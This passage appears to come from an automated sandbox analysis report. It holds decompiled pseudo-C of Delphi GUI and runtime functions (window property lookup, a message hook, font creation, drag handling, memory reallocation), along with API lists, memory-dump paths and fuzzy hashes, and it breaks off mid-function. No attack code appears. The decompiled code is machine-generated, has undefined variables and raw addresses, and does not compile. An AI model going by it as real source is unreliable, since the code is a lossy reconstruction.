                                                                            • Instruction ID: edcf506c367d5b21f12e8bc81a0964d5f28cf71cb3e8e791f3115fe585ddaeb4
                                                                            • Opcode Fuzzy Hash: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519
                                                                            • Instruction Fuzzy Hash: D3F0276120622367D2307B726D4287F514C8D143A4B81503FFD00E2141FB6CDC52A1BF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E0043747C(struct HWND__* __eax, void* __ecx) {
    intOrPtr _t5;
    struct HWND__* _t12;
    void* _t15;
    DWORD* _t16;

    _t13 = __ecx;
    _push(__ecx);
    _t12 = __eax;
    _t15 = 0;
    if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() == *_t16) {
        _t5 = *0x466508; // 0x2711cc0
        if(GlobalFindAtomA(E00404C00(_t5)) != *0x466502) {
            _t15 = E00437448(_t12, _t13);
        } else {
            _t15 = GetPropA(_t12, *0x466502 & 0x0000ffff);
        }
    }
    return _t15;
}


                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00437489
                                                                            • GetCurrentProcessId.KERNEL32(?,00460C02,00000000,004586E9,?,?,00460C02,00000001,00456D34,?,00000000,00000000,00000000,00000001), ref: 00437492
                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 004374A7
                                                                            • GetPropA.USER32 ref: 004374BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 2582817389-0
                                                                            • Opcode ID: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6
                                                                            • Instruction ID: a2f4f6fb400889014e80e2d2de551d02392c32fcff4c83d9196b20b4c67440de
                                                                            • Opcode Fuzzy Hash: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6
                                                                            • Instruction Fuzzy Hash: F2F0A7E120811476D53077B66C8282B198C8928368F02657BFA82E3297D56CEC4142BE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0045539C(void* __ecx) {
    void* _t2;
    DWORD* _t7;

    _t2 = *0x466580; // 0x26df470
    if( *((char*)(_t2 + 0xad)) == 0) {
        if( *0x466598 == 0) {
            _t2 = SetWindowsHookExA(3, E00455358, 0, GetCurrentThreadId());
            *0x466598 = _t2;
        }
        if( *0x466594 == 0) {
            _t2 = CreateEventA(0, 0, 0, 0);
            *0x466594 = _t2;
        }
        if( *0x46659c == 0) {
            _t2 = CreateThread(0, 0x3e8, E004552FC, 0, 0, _t7);
            *0x46659c = _t2;
        }
    }
    return _t2;
}


                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004553B4
                                                                            • SetWindowsHookExA.USER32 ref: 004553C4
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0045834E), ref: 004553DF
                                                                            • CreateThread.KERNEL32 ref: 00455403
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                            • String ID:
                                                                            • API String ID: 1195359707-0
                                                                            • Opcode ID: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb
                                                                            • Instruction ID: a9d03a39fb95b2e519a0ab36c9fe0646124770ff35457d36c1f1fd7bedb10476
                                                                            • Opcode Fuzzy Hash: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb
                                                                            • Instruction Fuzzy Hash: A6F01D70784780BEF610AB21BC17B2636949715B16F21517AF50A791D7E2F824888A5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0042ACC4() {
    signed char _v28;
    void* _t4;
    signed int _t8;
    struct HDC__* _t9;
    struct tagTEXTMETRICA* _t10;

    _t8 = 1;
    _t9 = GetDC(0);
    if(_t9 != 0) {
        _t4 = *0x466360; // 0x58a00b4
        if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) {
            _t8 = _v28 & 0x000000ff;
        }
        ReleaseDC(0, _t9);
    }
    return _t8;
}


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042ACCD
                                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF
                                                                            • GetTextMetricsA.GDI32(00000000), ref: 0042ACEA
                                                                            • ReleaseDC.USER32 ref: 0042ACFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                            • String ID:
                                                                            • API String ID: 2013942131-0
                                                                            • Opcode ID: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9
                                                                            • Instruction ID: de7c194213a4f2e578b42373dec20c7b80f31d2e9068f76ebd383a2718700f4b
                                                                            • Opcode Fuzzy Hash: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9
                                                                            • Instruction Fuzzy Hash: 23E0DF1174A23123D21032663C82BAB218C4F023A5F89013BFD24E93C1DA0DCD2083FF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
E00438C24(signed int __eax, void* __edi, void* __esi) {
    signed int _v5;
    signed int _v12;
    signed int _v13;
    intOrPtr _v17;
    intOrPtr _v21;
    void* __ebx;
    void* __ebp;
    signed int _t46;
    signed int _t47;
    signed int _t48;
    signed int _t49;
    signed int _t52;
    signed int _t53;
    void* _t54;
    signed int _t55;
    struct HICON__* _t56;
    intOrPtr _t61;
    signed int _t65;
    signed int _t69;
    signed int _t71;
    void* _t72;
    signed int _t76;
    signed int _t77;
    void* _t80;
    signed int _t81;
    intOrPtr _t82;
    signed int _t87;
    signed int _t90;
    signed int _t91;
    intOrPtr* _t97;
    void* _t100;
    signed int _t104;
    intOrPtr _t113;
    intOrPtr _t116;
    signed int _t118;
    signed int _t120;
    signed int _t122;
    signed int _t124;
    intOrPtr _t127;
    signed int _t128;
    signed int _t129;
    intOrPtr _t136;
    intOrPtr _t138;
    void* _t140;
    void* _t141;
    void* _t143;
    void* _t145;
    intOrPtr _t146;

    _t141 = __esi;
    _t140 = __edi;
    _t46 = __eax;
    _t143 = _t145;
    _t146 = _t145 + 0xffffffec;
    _v5 = __eax;
    _t97 = 0;
    _v13 = 0;
    if( *0x466514 == 0) {
        L36:
        return _t46;
    } else {
        _t46 = *0x466514; // 0x0
        if( *((char*)(_t46 + 5)) != 0) {
            goto L36;
        } else {
            _push(_t143);
            _push(0x438f39);
            _push( *[fs:edx]);
            *[fs:edx] = _t146;
            _t47 = *0x466514; // 0x0
            *0x466540 = _t47;
            _push(_t143);
            _push(0x438ec7);
            _push( *[fs:edx]);
            *[fs:edx] = _t146;
            _t48 = *0x466514; // 0x0
            *((char*)(_t48 + 5)) = 1;
            _t49 = *0x466514; // 0x0
            *((char*)(_t49 + 0x20)) = _v5 & 0x000000ff;
            _t113 = *0x46651c; // 0x0
            E00437AA4(_t113);
            if( *0x466530 == 2) {
                _t91 = *0x466514; // 0x0
                _t138 = *0x43519c; // 0x4351e8
                _t97 = E00403AD8(_t91, _t138);
                *((char*)(_t97 + 0x74)) = *((intOrPtr*)( *_t97 + 0x34))() & 0xffffff00 | *((intOrPtr*)(_t97 + 8)) == 0x00000000;
            }
            _t52 = *0x466514; // 0x0
            if( *((intOrPtr*)(_t52 + 8)) == 0) {
                L7:
                _t53 = *0x466514; // 0x0
                _v21 = *((intOrPtr*)(_t53 + 0x10));
                _t115 = *((intOrPtr*)(_t53 + 0x14));
                _v17 = *((intOrPtr*)(_t53 + 0x14));
            } else {
                _t87 = *0x466514; // 0x0
                _t136 = *0x4362e8; // 0x436334
                if(E00403AB4( *((intOrPtr*)(_t87 + 8)), _t136) == 0) {
                    goto L7;
                } else {
                    _t90 = *0x466514; // 0x0
                    _v21 = *((intOrPtr*)(_t90 + 0x18));
                    _t115 = *((intOrPtr*)(_t90 + 0x1c));
                    _v17 = *((intOrPtr*)(_t90 + 0x1c));
                }
            }
            _t54 = E00438BB0(_t143);
            _pop(_t100);
            if(_t54 == 0) {
                L14:
                _t55 = 0;
            } else {
                if( *0x466530 != 2 || *((char*)(_t97 + 0x74)) == 0) {
                    if( *0x466530 == 0) {
                        goto L14;
                    } else {
                        E004384B8(1);
                        if(1 == 0) {
                            goto L14;
                        } else {
                            goto L13;
                        }
                    }
                } else {
                    L13:
                    if(_v5 != 0) {
                        _t55 = 1;
                    } else {
                        goto L14;
                    }
                }
            }
            _v13 = _t55;
            if( *0x466530 != 2) {
                __eflags = *0x466534;
                if(__eflags == 0) {
                    _t56 = *0x466528; // 0x0
                    SetCursor(_t56);
                } else {
                    _t77 = *0x466534; // 0x0
                    E004440E4(_t77, _t115, __eflags);
                }
            } else {
                if(_v13 != 0 && *((char*)(_t97 + 0x74)) != 0) {
                    _t80 = E0044CE28( *((intOrPtr*)(_t97 + 0x40)));
                    if(_t80 != 0 && *((intOrPtr*)(_t80 + 0x268)) == *((intOrPtr*)(_t97 + 0x40))) {
                        E00451654(_t80, _t97, _t100, 0, _t140, _t141);
                    }
                    _t81 = *0x466514; // 0x0
                    _t82 = *0x466510; // 0x0
                    E0043BC9C(_t82, 0, 0xb03a, _t81);
                }
            }
            *0x466510 = 0;
            *0x466514 = 0;
            if( *0x466540 == 0) {
                L33:
                _pop(_t116);
                *[fs:eax] = _t116;
                _push(0x438ece);
                _t61 = *0x46653c; // 0x0
                E00403928(_t61);
                *0x46653c = 0;
                __eflags = *0x466540;
                if( *0x466540 != 0) {
                    _t65 = *0x466540; // 0x0
                    *((char*)(_t65 + 5)) = 0;
                    _t69 = *0x466540; // 0x0
                    *((intOrPtr*)( *_t69))(_v13 & 0x000000ff, _v17);
                }
                __eflags = 0;
                *0x466514 = 0;
                return 0;
            } else {
                _t71 = *0x466540; // 0x0
                if( *((intOrPtr*)(_t71 + 8)) == 0) {
                    goto L33;
                } else {
                    _t72 = 3;
                    if(_v13 == 0) {
                        _t72 = 4;
                        _t128 = *0x466540; // 0x0
                        *((intOrPtr*)(_t128 + 0x10)) = 0;
                        _t129 = *0x466540; // 0x0
                        *((intOrPtr*)(_t129 + 0x14)) = 0;
                        _v21 = 0;
                        _v17 = 0;
                    }
                    _t118 = *0x466540; // 0x0
                    _v12 = _t118;
                    _push(_t143);
                    _push(0x438e6b);
                    _push( *[fs:edx]);
                    *[fs:edx] = _t146;
                    _t120 = *0x466540; // 0x0
                    _t122 = *0x466540; // 0x0
                    _t124 = *0x466540; // 0x0
                    _t104 = *0x466540; // 0x0
                    E00438384( *((intOrPtr*)(_t124 + 0xc)), _t104, _t72, _t122 + 0x10, *((intOrPtr*)(_t120 + 8)));
                    _pop(_t127);
                    *[fs:eax] = _t127;
                    _push(0x438e72);
                    if( *0x466540 == 0) {
                        _t76 = _v12;
                        *0x466540 = _t76;
                        return _t76;
                    }
                    return 0;
                }
            }
        }
    }
}


                                                                            APIs
                                                                              • Part of subcall function 00437AA4: ReleaseCapture.USER32(00000000,00438C9B,00000000,00438EC7,?,00000000,00438F39), ref: 00437AA7
                                                                            • SetCursor.USER32(00000000,00000000,00438EC7,?,00000000,00438F39), ref: 00438DB3
                                                                              • Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100
                                                                            Strings
                                                                            • QC , xrefs: 00438CA9
                                                                            • 4cC , xrefs: 00438CDA
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CaptureCursorDragImageList_Release
                                                                            • String ID: 4cC$QC
                                                                            • API String ID: 1302740870-1275598162
                                                                            • Opcode ID: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a
                                                                            • Instruction ID: dc2065d6e0f599aa4aa913a50c49f208dad52c561c5e25ae754aa2762872304a
                                                                            • Opcode Fuzzy Hash: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a
                                                                            • Instruction Fuzzy Hash: 69819670604340AFD715CF18E846B56FBE1BB58308F1591BBE805873AAEB789941CB9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E0042590C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) { 				signed int _v8; 				struct tagLOGFONTA _v68; 				int _v72; 				char _v76; 				char _v80; 				char _v84; 				intOrPtr _t87; 				intOrPtr _t91; 				intOrPtr _t97; 				signed int _t106; 				char* _t110; 				int _t115; 				intOrPtr* _t121; 				void* _t124; 				void* _t138; 				intOrPtr _t149; 				int _t161; 				int* _t162; 				int _t164; 				void* _t167; 				void* _t168; 				intOrPtr _t169; 				int* _t181;  				_t167 = _t168; 				_t169 = _t168 + 0xffffffb0; 				_v84 = 0; 				_v80 = 0; 				_v76 = 0; 				_v72 = 0; 				_t138 = __eax; 				_push(_t167); 				_push(0x425b28); 				_push( *[fs:eax]); 				 *[fs:eax] = _t169; 				_v8 =  *((intOrPtr*)(__eax + 0x10)); 				if( *((intOrPtr*)(_v8 + 8)) != 0) { 					__eflags = 0; 					 *[fs:eax] = 0; 					_push(E00425B2F); 					return E00404760( &_v84, 4); 				} else { 					_t87 =  *0x466398; // 0x2711bc8 					E00424BEC(_t87); 					_push(_t167); 					_push(0x425b00); 					_push( *[fs:edx]); 					 *[fs:edx] = _t169; 					if( *((intOrPtr*)(_v8 + 8)) == 0) { 						_t12 = _v8 + 0x14; // 0xe8c38bd6 						_v68.lfHeight =  *_t12; 						_v68.lfWidth = 0; 						_t16 = _v8 + 0x18; // 0xffffff88 						_t97 =  *_t16; 						_v68.lfEscapement = _t97; 						_v68.lfOrientation = _t97; 						if(( *(_v8 + 0x1d) & 0x00000001) == 0) { 							_v68.lfWeight = 0x190; 						} else { 							_v68.lfWeight = 0x2bc; 						} 						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000002) != 0x00000000; 						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000004) != 0x00000000; 						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000008) != 0x00000000; 						_t47 = _v8 + 0x1e; // 0x5a590424 						_t106 =  *_t47 & 0x000000ff; 						if(_t106 != 1) { 							L8: 							_v68.lfCharSet = _t106; 						} else { 							_t177 =  
*0x461c3a - 1; 							if( *0x461c3a == 1) { 								goto L8; 							} else { 								_v68.lfCharSet =  *0x461c3a & 0x000000ff; 							} 						} 						E004049A0( &_v72, _v8 + 0x1f, _t177); 						_t164 = _v72; 						if(_t164 != 0) { 							_t164 =  *(_t164 - 4); 						} 						_t161 = "Default"; 						if(_t161 != 0) { 							_t162 = _t161 - 4; 							_t181 = _t162; 							_t161 =  *_t162; 						} 						_t110 = E00404C00("Default"); 						E004049A0( &_v76, _v8 + 0x1f, _t181); 						_t115 = CompareStringA(0x400, 1, E00404C00(_v76), _t164, _t110, _t161); 						_t182 = _t115 != 2; 						if(_t115 != 2) { 							__eflags = _v8 + 0x1f; 							E004049A0( &_v84, _v8 + 0x1f, _v8 + 0x1f); 							E004090B0( &(_v68.lfFaceName), _v84); 						} else { 							E004049A0( &_v80, 0x461c3b, _t182); 							E004090B0( &(_v68.lfFaceName), _v80); 						} 						_t121 =  *0x462f2c; // 0x4617c0 						if( *_t121 == 1 && E0042ACC4() == 0x80 && E004258E0(_v8 + 0x10) != 0) { 							_v68.lfCharSet = 0x80; 						} 						_v68.lfQuality = 0; 						if(_v68.lfOrientation == 0) { 							_v68.lfOutPrecision = 0; 						} else { 							_v68.lfOutPrecision = 7; 						} 						_v68.lfClipPrecision = 0; 						_t124 = E00425C84(_t138) - 1; 						if(_t124 == 0) { 							_v68.lfPitchAndFamily = 2; 						} else { 							if(_t124 == 1) { 								_v68.lfPitchAndFamily = 1; 							} else { 								_v68.lfPitchAndFamily = 0; 							} 						} 						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68); 					} 					_pop(_t149); 					 *[fs:eax] = _t149; 					_push(E00425B07); 					_t91 =  *0x466398; // 0x2711bc8 					return E00424BF8(_t91); 				} 			}                        


                                                                            APIs
                                                                              • Part of subcall function 00424BEC: EnterCriticalSection.KERNEL32(02711C10,004261DF), ref: 00424BF0
                                                                            • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,00425B00,?,00000000,00425B28,?,?,?,?), ref: 00425A3B
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00425ADD
                                                                            Strings
                                                                            • Default , xrefs: 00425A02, 00425A10, 00425A11
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                            • String ID: Default
                                                                            • API String ID: 249151401-753088835
                                                                            • Opcode ID: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055
                                                                            • Instruction ID: cdc74d9fd1ebb00f32cf96949c10078f4083309e396aabd750659c696ce78f0f
                                                                            • Opcode Fuzzy Hash: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055
                                                                            • Instruction Fuzzy Hash: 6961C570B04658DFDB10DFA8D481B9EBBF5AF49304FA54066E400B7392D378AE41CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E00446F1C(int __eax, signed int __ecx, void* __edx, void* __fp0, char* _a4, intOrPtr _a8, intOrPtr _a12) { 				signed int _v5; 				char _v12; 				struct tagMSG _v40; 				char _v48; 				void* __ebp; 				int _t33; 				int _t40; 				intOrPtr _t41; 				char* _t42; 				int _t45; 				int _t58; 				intOrPtr _t72; 				int _t79; 				int _t80; 				void* _t81; 				void* _t87;  				_t87 = __fp0; 				_t33 = __eax; 				_v5 = __ecx; 				_t58 = __eax; 				if(__edx != 0) { 					L17: 					return _t33; 				} 				_t83 = _v5 & 0x00000040; 				if((_v5 & 0x00000040) == 0) { 					E0041938C(_a12,  &_v48, _a8); 					_t61 =  &_v12; 					_t33 = E00445384(_t58,  &_v12,  &_v48, __eflags); 					_t79 = _t33; 					__eflags = _t79; 					if(_t79 == 0) { 						goto L17; 					} 					__eflags = _v12 - 0x12; 					if(__eflags != 0) { 						__eflags = _v12 - 2; 						if(_v12 != 2) { 							goto L17; 						} 						_t40 = PeekMessageA( &_v40, E004423F8( *((intOrPtr*)(_t58 + 0x14))), 0x203, 0x203, 0); 						__eflags = _t40; 						if(_t40 == 0) { 							_t72 =  *0x4369e8; // 0x436a34 							_t45 = E00403AB4( *((intOrPtr*)(_t79 + 4)), _t72); 							__eflags = _t45; 							if(_t45 != 0) { 								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t79 + 4)))) + 0xd4))(); 							} 						} 						_t41 =  *((intOrPtr*)(_t79 + 4)); 						__eflags =  *((char*)(_t41 + 0x8f)) - 1; 						if( *((char*)(_t41 + 0x8f)) == 1) { 							__eflags =  *((char*)(_t41 + 0x5d)) - 1; 							if( *((char*)(_t41 + 0x5d)) == 1) { 								__eflags = 0; 								E0043B120(_t41, _t61 | 0xffffffff, 0, _t81, _t87); 							} 						} 						_t42 = _a4; 						 *_t42 = 1; 						return _t42; 					} 					E0041938C(_a12,  &_v48, _a8); 					return E00446600(_t58,  &_v48, _t79, __eflags); 				} 				E0041938C(_a12,  &_v48, _a8); 				_t33 = E00445384(_t58,  &_v12,  &_v48, _t83); 				_t80 = _t33; 				if(_t80 != 0 &&  
*((intOrPtr*)(_t80 + 4)) != 0 && _v12 == 2) { 					E00438F48(); 					return E0043B7E4( *((intOrPtr*)(_t80 + 4)), 0, 0, 1); 				} 				goto L17; 			}                        


                                                                            Strings
                                                                            • 4jC , xrefs: 00446FFA
                                                                            • @ , xrefs: 00446F31
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: PointsWindow
                                                                            • String ID: 4jC$@
                                                                            • API String ID: 4123100037-871394707
                                                                            • Opcode ID: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2
                                                                            • Instruction ID: 86af40c0e3280406c22fdaa537b1eb5ee5ae63b826341ce694b4907392a73c8c
                                                                            • Opcode Fuzzy Hash: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2
                                                                            • Instruction Fuzzy Hash: 5131A230A052089BEF20DF68C895BDEB7A5AF14354F00C1ABEC5167382CB78ED45CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E0040C572(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    char _v8;
    struct _MEMORY_BASIC_INFORMATION _v36;
    char _v297;
    char _v304;
    intOrPtr _v308;
    char _v312;
    char _v316;
    char _v320;
    intOrPtr _v324;
    char _v328;
    void* _v332;
    char _v336;
    char _v340;
    char _v344;
    char _v348;
    intOrPtr _v352;
    char _v356;
    char _v360;
    char _v364;
    void* _v368;
    char _v372;
    intOrPtr _t52;
    intOrPtr _t60;
    intOrPtr _t82;
    intOrPtr _t86;
    intOrPtr _t89;
    intOrPtr _t101;
    void* _t108;
    intOrPtr _t110;
    void* _t113;

    _t108 = __edi;
    _v372 = 0;
    _v336 = 0;
    _v344 = 0;
    _v340 = 0;
    _v8 = 0;
    _push(_t113);
    _push(0x40c72f);
    _push( *[fs:eax]);
    *[fs:eax] = _t113 + 0xfffffe90;
    _t89 = *((intOrPtr*)(_a4 - 4));
    if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
        _t52 = *0x462dac; // 0x407654
        E00406740(_t52, &_v8);
    } else {
        _t86 = *0x462f40; // 0x40764c
        E00406740(_t86, &_v8);
    }
    _t110 = *((intOrPtr*)(_t89 + 0x18));
    VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c);
    if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) {
        _v368 = *(_t89 + 0xc);
        _v364 = 5;
        _v360 = _v8;
        _v356 = 0xb;
        _v352 = _t110;
        _v348 = 5;
        _t60 = *0x462db8; // 0x4075fc
        E00406740(_t60, &_v372);
        E0040C158(_t89, _v372, 1, _t108, _t110, "true", &_v368);
    } else {
        _v332 = *(_t89 + 0xc);
        _v328 = 5;
        E004049AC( &_v340, 0x105, &_v297);
        E00408F20(_v340, &_v336);
        _v324 = _v336;
        _v320 = 0xb;
        _v316 = _v8;
        _v312 = 0xb;
        _v308 = _t110;
        _v304 = 5;
        _t82 = *0x462e34; // 0x407714
        E00406740(_t82, &_v344);
        E0040C158(_t89, _v344, 1, _t108, _t110, 3, &_v332);
    }
    _pop(_t101);
    *[fs:eax] = _t101;
    _push(E0040C736);
    E0040473C( &_v372);
    E00404760( &_v344, 3);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • Lv@ , xrefs: 0040C5B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                            • String ID: Lv@
                                                                            • API String ID: 902310565-2306355798
                                                                            • Opcode ID: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace
                                                                            • Instruction ID: 312cfa349de001423b8fa7d1abb7a1f31512e968929e1d2ab1301cf878b75628
                                                                            • Opcode Fuzzy Hash: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace
                                                                            • Instruction Fuzzy Hash: AB311870900658DFDB61DB64CD81BDAB7F9AB49304F4040FAE508A7291E7B8AE848F55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
E00401D68(signed int __eax, signed int __edx, void* __edi) {
    signed int _t58;
    signed int _t73;
    signed int _t80;
    signed int _t86;
    signed int _t94;
    signed int _t100;
    void* _t102;
    signed int _t111;
    signed int _t119;
    signed int _t125;
    signed int _t131;
    signed int _t133;
    signed int _t136;
    intOrPtr _t139;
    void* _t141;
    signed int _t143;
    signed int _t145;
    unsigned int _t146;
    signed int _t153;
    unsigned int _t154;
    intOrPtr _t157;
    void* _t160;
    intOrPtr _t168;
    intOrPtr _t170;
    signed int _t173;
    signed int _t174;
    signed int _t175;
    void* _t182;
    unsigned int _t184;
    signed int _t190;
    signed int _t193;
    signed int _t195;
    signed int _t196;
    signed int _t198;
    void* _t202;
    signed int _t203;
    signed int _t204;
    void* _t205;
    signed int _t208;

    _t181 = __edi;
    _t166 = __edx;
    _t145 = *(__eax - 4);
    _t196 = __eax;
    if((_t145 & 0x00000007) != 0) {
        __eflags = _t145 & 0x00000005;
        if((_t145 & 0x00000005) != 0) {
            __eflags = _t145 & 0x00000003;
            if((_t145 & 0x00000003) != 0) {
                __eflags = 0;
                return 0;
            } else {
                _t146 = _t145 - 0x18;
                __eflags = __edx - _t146;
                if(__edx <= _t146) {
                    __eflags = __edx - _t146 >> 1;
                    if(__edx < _t146 >> 1) {
                        _t131 = __edx;
                        _t58 = E00401820(__edx);
                        __eflags = _t58;
                        if(_t58 == 0) {
                            goto L61;
                        } else {
                            __eflags = _t131 - 0x40a2c;
                            if(_t131 > 0x40a2c) {
                                *((intOrPtr*)(_t58 - 8)) = _t131;
                            }
                            E004015A0(_t196, _t131, _t58);
                            E00401B88(_t196, _t181);
                            return _t58;
                        }
                    } else {
                        *((intOrPtr*)(__eax - 8)) = __edx;
                        return __eax;
                    }
                } else {
                    asm("adc eax, 0xffffffff");
                    _t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
                    _push(__edx);
                    _t58 = E00401820((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
                    _pop(_t168);
                    __eflags = _t58;
                    if(_t58 != 0) {
                        __eflags = _t133 - 0x40a2c;
                        if(_t133 > 0x40a2c) {
                            *((intOrPtr*)(_t58 - 8)) = _t168;
                        }
                        E00401570(_t196, *((intOrPtr*)(_t196 - 8)), _t58);
                        E00401B88(_t196, _t181);
                        return _t58;
                    }
                    L61:
                    return _t58;
                }
            }
        } else {
